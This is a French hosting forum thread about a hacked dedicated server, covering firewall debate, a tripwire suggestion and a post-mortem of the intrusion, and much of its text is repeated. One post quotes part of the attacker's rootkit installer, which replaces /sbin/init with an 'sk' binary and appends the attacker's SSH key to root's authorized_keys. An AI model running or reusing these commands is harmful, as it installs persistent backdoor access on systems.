Poster une réponse à un sujet: Ouh le vilain pirate :o
Attention, ce sujet est un sujet ancien (7261 jours sans réponse)
cauet
Oui effectivement, c'est *pratiquement* impossible d'avoir un firewall hard en housing dans un datacentre..
a moins de louer un 3-4 unités et d'aller installer son propre matos. chez OVH ca se fait, tu peux louer 1U simplémentaire et automatiquement un accès electrique avec 300W je pense..
principal c'est que tout est revenu..
[JOKE] ca à du bon les bloquages de port de skynet, au moins on risque pas d'avoir un smtp relay installé sans notre plein gré (comme dirait virenque..)[/JOKE]
a moins de louer un 3-4 unités et d'aller installer son propre matos. chez OVH ca se fait, tu peux louer 1U simplémentaire et automatiquement un accès electrique avec 300W je pense..
principal c'est que tout est revenu..
[JOKE] ca à du bon les bloquages de port de skynet, au moins on risque pas d'avoir un smtp relay installé sans notre plein gré (comme dirait virenque..)[/JOKE]
zion
ovh
T'es un as zion
On t'aime
On t'aime
zion
ayé, tout est censé refonctionner les enfants... pfiouf
saloperie va
saloperie va
ovh
Ben voilà t'es pas riche mais au moins t'es célèbre...
zion
mickael> de fait, donc bon, un firewall soft, j'en vois pas l'utilité... suffit d'un bon outil de monitoring pour voir ce qu'il se passe, et en 2 ans, c'est la première fois que ca m'arrive, et par faute d'un upgrade oublié, pas vu ou inexistant (apparemment y en a pas encore si j'utilise urpmi, bien que je ne l'utilisais pas sur webmin).
quand je compare, ma machine a tenu vachement longtemps, je vais pas me plaindre, et vu qu'ils m'attaquent comme des bourrins depuis une semaine, les chances ne sont pas de mon côté.
Et quand je vois les multiples intrusions/dégats, il est fort probable qu'il y ait eu un concours sur ma tête
quand je compare, ma machine a tenu vachement longtemps, je vais pas me plaindre, et vu qu'ils m'attaquent comme des bourrins depuis une semaine, les chances ne sont pas de mon côté.
Et quand je vois les multiples intrusions/dégats, il est fort probable qu'il y ait eu un concours sur ma tête
ovh
OK t'as pas tort, mais avec un serveur dédié tu n'as pas ça, tu n'as que ta machine à toi
cauet
Ca n'a rien à voir avec le fait que le fw soit soft ou hard, ni qu'il soit en amont ou pas, ça n'aurait rien changé je pense.
Par contre, il existe un outil qui s'appelle tripwire, qui permet de vérifier qu'on ne substitue pas les binaires d'origine (il calcule une somme de contrôle et vérifie périodiquement).
http://www.tripwire.org
Par contre, il existe un outil qui s'appelle tripwire, qui permet de vérifier qu'on ne substitue pas les binaires d'origine (il calcule une somme de contrôle et vérifie périodiquement).
http://www.tripwire.org
Ben oui mais évidemment j'y avais pas pensé... mais fait aller ta jugeotte parfois ma poule..
comment il l'aurait fait aller son pti serveur irc, et son pti ssh perso si les ports étaient bloqués en entrées et qu'il n'ai aucun moyen des les ouvrir ? il l'aurait peut-etre mit sur le 80 ou le 25 ouvert, ca oui.
Seulement avec un iptable, il à vite fait de virer la conf en 2 minutes .. avec un firewall en amont, vas-y toujours à moins de hacker le firewall hardware..
zion
parce que spamassassin, webmin et pleins d'autres trucs ont besoin de perl
mais perl a été utilisé au travers d'un exploit webmin... donc il a utilisé webmin, puis un exploit perl pour foutre un backdoor + key logger... Par contre, il a eu apparemment du mal à se connecter en ssh, logique, root y a pas accès
Il a tenté de rajouter sa clé RSA:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
un morceau du script pour le plaisir:
il a uploadé un pack d'une dizaine d'exploits en fait, puis il a tout testé le con
mais perl a été utilisé au travers d'un exploit webmin... donc il a utilisé webmin, puis un exploit perl pour foutre un backdoor + key logger... Par contre, il a eu apparemment du mal à se connecter en ssh, logique, root y a pas accès
Il a tenté de rajouter sa clé RSA:
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
un morceau du script pour le plaisir:
chmod 0755 sk; if [ ! -f /sbin/init${H} ]; then cp -f /sbin/init /sbin/init${H}; fi; rm -f /sbin/init; cp sk /sbin/init
echo Your home is $D, go there and type ./sk to install
echo us into memory. Have fun!
mkdir -p /root/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
cd $FD
cd ..
rm -rf local local.tgz
/usr/share/locale/sk/.sk12/sk
echo Your home is $D, go there and type ./sk to install
echo us into memory. Have fun!
mkdir -p /root/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEA29D2P7P/WVC5VCGWTZfbrXV4Zmz/Qvf1FdQTOoiCvBzLLxrY0Ya- WLjJiMZcQ2Y1a4RIaEhRhdezj1yWECQc3DI/YvT58/9TJ8DYCbaDpvToryXGm0idgz2M7/3FQEUhbpPX- +2E3yMs7WaUg1VNf92W5x/ed/FbTJo2u9bqFfJaM= root@localhost" >> /root/.ssh/authorized_keys
cd $FD
cd ..
rm -rf local local.tgz
/usr/share/locale/sk/.sk12/sk
il a uploadé un pack d'une dizaine d'exploits en fait, puis il a tout testé le con
Poire
pk le perl est activé ?